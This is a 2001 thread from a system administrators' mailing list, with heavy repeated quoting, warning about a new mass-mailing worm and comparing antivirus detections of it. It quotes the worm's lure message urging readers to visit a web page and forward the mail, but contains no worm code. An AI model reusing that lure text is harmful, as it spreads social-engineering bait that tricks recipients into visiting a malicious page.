** William *did not* send you a virus. The email made our McAfee detect it as a VBS/Generic@MM virus against a scan engine of 4.1.40 and a dat of 4155 set for heuristic scanning. mcafee is being a bit sensitive (and rightly so) MaAfee refers to it as VBS/Loding.a@MM (even tho the 4155 dat refers to it as VBS/Generic@MM) http://vil.nai.com/vil/virusSummary.asp?virus_k=99185 worse still, also there is JS/Offensive http://vil.nai.com/vil/virusSummary.asp?virus_k=99189 probably a mutation can anyone tell me the key bit of java script so I can use my content filter (Mimesweeper) to block the mutations. regards Dean -Original Message- From: Stu Sjouwerman [mailto:[EMAIL PROTECTED]] Sent: Tuesday, 28 August 2001 10:50 a.m. To: NT System Admin Issues Subject: RE: New Worm on the loose It sure is out there, I already got a bunch. Stu > -Original Message----- > From: Jay Woody [mailto:[EMAIL PROTECTED]] > Sent: Monday, August 27, 2001 5:48 PM > To: NT System Admin Issues > Subject: Re: New Worm on the loose > > > Is there a subject line? > > JayW > > >>> [EMAIL PROTECTED] 08/27/01 03:46PM >>> > Sorry about the cross posting. > > We don't have a lot of specifics on it, but there appears to be a new worm > on the loose. The payload is a typical Melissa-style worm, where its only > action is to send mail to all members of the GAL, with the following > message: > "Hi, how are you ? I am fine here. Please read the page > http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack > you. Forword this mail to help all your friends too." > > Its plain text, and carries no executables with it, but I haven't visited > the website yet. More info to follow, but there is zero information on the > web about it at this point. > > Roger > -- > Roger D. Seielstad - MCSE MCT > Senior Systems Administrator > Peregrine Systems > Atlanta, GA > http://www.peregrine.com > > > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > > > > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm *** This e-mail is not an official statement of the Waikato Regional Council unless otherwise stated. Visit our website http://www.ew.govt.nz *** http://www.sunbelt-software.com/ntsysadmin_list_charter.htm DO NOT read, copy or disseminate this communication unless you are the intended addressee. This e-mail communication contains confidential and/or privileged information intended only for the addressee. If you have received this communication in error, please call us immediately at (907) 561-1250 and ask to speak to the sender of the communication. Also, please e-mail the sender and notify the sender immediately that you have received the communication in error. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
William may well of triggered some of your AV products off with a reply to this message. It contained the javascript associated with the page. **Even tho it was benign ** William *did not* send you a virus. The email made our McAfee detect it as a VBS/Generic@MM virus against a scan engine of 4.1.40 and a dat of 4155 set for heuristic scanning. mcafee is being a bit sensitive (and rightly so) MaAfee refers to it as VBS/Loding.a@MM (even tho the 4155 dat refers to it as VBS/Generic@MM) http://vil.nai.com/vil/virusSummary.asp?virus_k=99185 worse still, also there is JS/Offensive http://vil.nai.com/vil/virusSummary.asp?virus_k=99189 probably a mutation can anyone tell me the key bit of java script so I can use my content filter (Mimesweeper) to block the mutations. regards Dean -Original Message- From: Stu Sjouwerman [mailto:[EMAIL PROTECTED]] Sent: Tuesday, 28 August 2001 10:50 a.m. To: NT System Admin Issues Subject: RE: New Worm on the loose It sure is out there, I already got a bunch. Stu > -Original Message- > From: Jay Woody [mailto:[EMAIL PROTECTED]] > Sent: Monday, August 27, 2001 5:48 PM > To: NT System Admin Issues > Subject: Re: New Worm on the loose > > > Is there a subject line? > > JayW > > >>> [EMAIL PROTECTED] 08/27/01 03:46PM >>> > Sorry about the cross posting. > > We don't have a lot of specifics on it, but there appears to be a new worm > on the loose. The payload is a typical Melissa-style worm, where its only > action is to send mail to all members of the GAL, with the following > message: > "Hi, how are you ? I am fine here. Please read the page > http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack > you. Forword this mail to help all your friends too." > > Its plain text, and carries no executables with it, but I haven't visited > the website yet. More info to follow, but there is zero information on the > web about it at this point. > > Roger > -- > Roger D. Seielstad - MCSE MCT > Senior Systems Administrator > Peregrine Systems > Atlanta, GA > http://www.peregrine.com > > > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > > > > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm *** This e-mail is not an official statement of the Waikato Regional Council unless otherwise stated. Visit our website http://www.ew.govt.nz *** http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
Mind the Gap! -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 3:51 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Hi ! (notice the space) ("notice the space" is not part of the subject) -Original Message- From: Jay Woody [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:48 PM To: NT System Admin Issues Subject: Re: New Worm on the loose Is there a subject line? JayW >>> [EMAIL PROTECTED] 08/27/01 03:46PM >>> Sorry about the cross posting. We don't have a lot of specifics on it, but there appears to be a new worm on the loose. The payload is a typical Melissa-style worm, where its only action is to send mail to all members of the GAL, with the following message: "Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too." Its plain text, and carries no executables with it, but I haven't visited the website yet. More info to follow, but there is zero information on the web about it at this point. Roger -- Roger D. Seielstad - MCSE MCT Senior Systems Administrator Peregrine Systems Atlanta, GA http://www.peregrine.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
Hi ! (notice the space) ("notice the space" is not part of the subject) -Original Message- From: Jay Woody [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:48 PM To: NT System Admin Issues Subject: Re: New Worm on the loose Is there a subject line? JayW >>> [EMAIL PROTECTED] 08/27/01 03:46PM >>> Sorry about the cross posting. We don't have a lot of specifics on it, but there appears to be a new worm on the loose. The payload is a typical Melissa-style worm, where its only action is to send mail to all members of the GAL, with the following message: "Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too." Its plain text, and carries no executables with it, but I haven't visited the website yet. More info to follow, but there is zero information on the web about it at this point. Roger -- Roger D. Seielstad - MCSE MCT Senior Systems Administrator Peregrine Systems Atlanta, GA http://www.peregrine.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
It sure is out there, I already got a bunch. Stu > -Original Message- > From: Jay Woody [mailto:[EMAIL PROTECTED]] > Sent: Monday, August 27, 2001 5:48 PM > To: NT System Admin Issues > Subject: Re: New Worm on the loose > > > Is there a subject line? > > JayW > > >>> [EMAIL PROTECTED] 08/27/01 03:46PM >>> > Sorry about the cross posting. > > We don't have a lot of specifics on it, but there appears to be a new worm > on the loose. The payload is a typical Melissa-style worm, where its only > action is to send mail to all members of the GAL, with the following > message: > "Hi, how are you ? I am fine here. Please read the page > http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack > you. Forword this mail to help all your friends too." > > Its plain text, and carries no executables with it, but I haven't visited > the website yet. More info to follow, but there is zero information on the > web about it at this point. > > Roger > -- > Roger D. Seielstad - MCSE MCT > Senior Systems Administrator > Peregrine Systems > Atlanta, GA > http://www.peregrine.com > > > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > > > > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
Subject: Hi ! Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell & Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]> -Original Message- From: Jay Woody [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 1:48 PM To: NT System Admin Issues Subject: Re: New Worm on the loose Is there a subject line? JayW >>> [EMAIL PROTECTED] 08/27/01 03:46PM >>> Sorry about the cross posting. We don't have a lot of specifics on it, but there appears to be a new worm on the loose. The payload is a typical Melissa-style worm, where its only action is to send mail to all members of the GAL, with the following message: "Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too." Its plain text, and carries no executables with it, but I haven't visited the website yet. More info to follow, but there is zero information on the web about it at this point. Roger -- Roger D. Seielstad - MCSE MCT Senior Systems Administrator Peregrine Systems Atlanta, GA http://www.peregrine.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm DO NOT read, copy or disseminate this communication unless you are the intended addressee. This e-mail communication contains confidential and/or privileged information intended only for the addressee. If you have received this communication in error, please call us immediately at (907) 561-1250 and ask to speak to the sender of the communication. Also, please e-mail the sender and notify the sender immediately that you have received the communication in error. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Re: New Worm on the loose
Is there a subject line? JayW >>> [EMAIL PROTECTED] 08/27/01 03:46PM >>> Sorry about the cross posting. We don't have a lot of specifics on it, but there appears to be a new worm on the loose. The payload is a typical Melissa-style worm, where its only action is to send mail to all members of the GAL, with the following message: "Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too." Its plain text, and carries no executables with it, but I haven't visited the website yet. More info to follow, but there is zero information on the web about it at this point. Roger -- Roger D. Seielstad - MCSE MCT Senior Systems Administrator Peregrine Systems Atlanta, GA http://www.peregrine.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
I just received the message. It came from (sender) [EMAIL PROTECTED], the Subject is simply "Hi!" I received it at 5:11PM. Jesse E. Gardner, MCP P.O. Box 11431 Columbia, SC 29211 (803)216-0119 (803)216-0921 fax (803)361-4361 cell [EMAIL PROTECTED] -Original Message- From: Roger Seielstad [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 4:46 PM To: NT System Admin Issues Subject:New Worm on the loose Importance: High Sorry about the cross posting. We don't have a lot of specifics on it, but there appears to be a new worm on the loose. The payload is a typical Melissa-style worm, where its only action is to send mail to all members of the GAL, with the following message: "Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too." Its plain text, and carries no executables with it, but I haven't visited the website yet. More info to follow, but there is zero information on the web about it at this point. Roger -- Roger D. Seielstad - MCSE MCT Senior Systems Administrator Peregrine Systems Atlanta, GA http://www.peregrine.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
Thanks for the info... I'm presently investigating some strange behavior on my laptop. My Palm Pilot desktop software has suddenly gone belly up for no apparent reason (C:\palm\palm.exe). I'm running Norton AV 2K on my system and I will be checking for updates and running a complete scan. Jesse E. Gardner, MCP P.O. Box 11431 Columbia, SC 29211 (803)216-0119 (803)216-0921 fax (803)361-4361 cell [EMAIL PROTECTED] -Original Message- From: Roger Seielstad [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 4:46 PM To: NT System Admin Issues Subject:New Worm on the loose Importance: High Sorry about the cross posting. We don't have a lot of specifics on it, but there appears to be a new worm on the loose. The payload is a typical Melissa-style worm, where its only action is to send mail to all members of the GAL, with the following message: "Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too." Its plain text, and carries no executables with it, but I haven't visited the website yet. More info to follow, but there is zero information on the web about it at this point. Roger -- Roger D. Seielstad - MCSE MCT Senior Systems Administrator Peregrine Systems Atlanta, GA http://www.peregrine.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm